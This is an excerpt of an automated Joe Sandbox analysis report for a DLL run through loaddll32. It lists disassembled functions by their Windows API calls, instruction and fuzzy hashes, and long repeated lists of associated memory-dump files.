                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Interlocked$CompletionExchangeH_prologIncrementPostQueuedStatus
                              • String ID:
                              • API String ID: 2960987973-0
                              • Opcode ID: c5e52207197d19df65b867db471a30e8f227160ba45510579f4b3e3d584e7fe1
                              • Instruction ID: cc02d636f397954af1976fe72a0d559d44c9a17d9548f1a34c0928ce55b2219a
                              • Opcode Fuzzy Hash: c5e52207197d19df65b867db471a30e8f227160ba45510579f4b3e3d584e7fe1
                              • Instruction Fuzzy Hash: 6B017171500605ABD764DF90C949FEAB3B8FF55715F10062DF142A2A80DB70BA49DBA0
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB2463
                              • DeleteCriticalSection.KERNEL32(?), ref: 6CEB2482
                              • CloseHandle.KERNEL32(00000000), ref: 6CEB2491
                              • CloseHandle.KERNEL32(00000000), ref: 6CEB24AC
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CriticalDeleteH_prologSection
                              • String ID:
                              • API String ID: 2456309408-0
                              • Opcode ID: 05644144f74cf3b38c8ce7b4cd7d0e522ccdf4ce1c963bf6a72a1c1e401a17c5
                              • Instruction ID: 56b35845559b6694af4d630ec50e507832c2e974137e3915e7b7ec8bbebc00b7
                              • Opcode Fuzzy Hash: 05644144f74cf3b38c8ce7b4cd7d0e522ccdf4ce1c963bf6a72a1c1e401a17c5
                              • Instruction Fuzzy Hash: CE01A271501745DFC7608F64D9087A9BBB4EF18708F20891EE446A2F50CB746648CB61
                              APIs
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,?,?,6CEC1506), ref: 6CEB236C
                              • InterlockedExchange.KERNEL32(-00000030,00000001), ref: 6CEB237E
                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000001,00000000,?,00000000,?,?,6CEC1506), ref: 6CEB238D
                              • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 6CEB239A
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExchangeInterlocked$CompletionObjectPostQueuedSingleStatusWait
                              • String ID:
                              • API String ID: 733047984-0
                              • Opcode ID: 58bca273866d8fd13fa52bf8b81941422e8918e61d33d98af6d7473ab88cf670
                              • Instruction ID: 72d7716786f27012a0fa2bea9fe8bdc796aaef94e507171aaf193e72b80f1055
                              • Opcode Fuzzy Hash: 58bca273866d8fd13fa52bf8b81941422e8918e61d33d98af6d7473ab88cf670
                              • Instruction Fuzzy Hash: 21F030B1708111AFDB548FA4DC88F5677BDFF0E3A97200925F891D7290DAB0D8809B20
                              APIs
                              • _malloc.LIBCMT ref: 6CEB5DAA
                                • Part of subcall function 6CECB71C: __FF_MSGBANNER.LIBCMT ref: 6CECB733
                                • Part of subcall function 6CECB71C: __NMSG_WRITE.LIBCMT ref: 6CECB73A
                                • Part of subcall function 6CECB71C: RtlAllocateHeap.NTDLL(01030000,00000000,00000001,00000000,00000000,00000000,?,6CED121A,?,?,?,00000000,?,6CED1107,00000018,6CEEAEA8), ref: 6CECB75F
                              • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000,00000000,?,?,?,?,?,6CEB871B), ref: 6CEB5DBC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateFolderHeapPathSpecial_malloc
                              • String ID: \save.dat
                              • API String ID: 4128168839-3580179773
                              • Opcode ID: 509281cdf216f1de8d6006133c6bddd26c7197ed6a5d8ad66742e72740b1ac73
                              • Instruction ID: ed09e09cc942b67656520d1fb5a979b79fa5cc623d73f42d3cd5d390b9b24f04
                              • Opcode Fuzzy Hash: 509281cdf216f1de8d6006133c6bddd26c7197ed6a5d8ad66742e72740b1ac73
                              • Instruction Fuzzy Hash: 7E117D33A062443BDB12CE65C9819AFBF7ADF86658B3402ACF8447B701DA731D06C2E0
                              APIs
                              • std::exception::exception.LIBCMT ref: 6CECA0EF
                                • Part of subcall function 6CECAC43: std::exception::_Copy_str.LIBCMT ref: 6CECAC5C
                                • Part of subcall function 6CEC94B0: __CxxThrowException@8.LIBCMT ref: 6CEC950E
                              • std::exception::exception.LIBCMT ref: 6CECA14E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
                              • String ID: $
                              • API String ID: 2140441600-3993045852
                              • Opcode ID: 21165786b8b8883df4376d99aa30738e270ab4acb6d54ac274b25c030584dba3
                              • Instruction ID: 6174909d61d3ee472a4d699c8ba0826d3b09e7de408eb315b9f88606626d7c33
                              • Opcode Fuzzy Hash: 21165786b8b8883df4376d99aa30738e270ab4acb6d54ac274b25c030584dba3
                              • Instruction Fuzzy Hash: 8821F2B26087809FD710CF64C545B9BBBF4AB88B48F204A1DF4A187B91D7B9D548CB93
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB19AE
                              • std::exception::exception.LIBCMT ref: 6CEB19D0
                                • Part of subcall function 6CECAC43: std::exception::_Copy_str.LIBCMT ref: 6CECAC5C
                                • Part of subcall function 6CEBE615: __CxxThrowException@8.LIBCMT ref: 6CEBE674
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Copy_strException@8H_prologThrowstd::exception::_std::exception::exception
                              • String ID: ^l
                              • API String ID: 2887958872-2649338665
                              • Opcode ID: 58e4301eec87e4d4aef2316c7af34a17c6b62fb5ad9822a376213c343e06d293
                              • Instruction ID: b0e0c1f46d4ff5e851588e9f5cb44aa1e9a041db505b3ac16d536ab9e07e8e90
                              • Opcode Fuzzy Hash: 58e4301eec87e4d4aef2316c7af34a17c6b62fb5ad9822a376213c343e06d293
                              • Instruction Fuzzy Hash: 83F064B5C11209ABCB04CFA4D5427ECB7B8EB08318F20405EE820A7B10CB35A605CFA2
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB44D8
                              • std::bad_exception::bad_exception.LIBCMT ref: 6CEB44ED
                                • Part of subcall function 6CECAC27: std::exception::exception.LIBCMT ref: 6CECAC31
                                • Part of subcall function 6CEBEC65: __CxxThrowException@8.LIBCMT ref: 6CEBECBB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
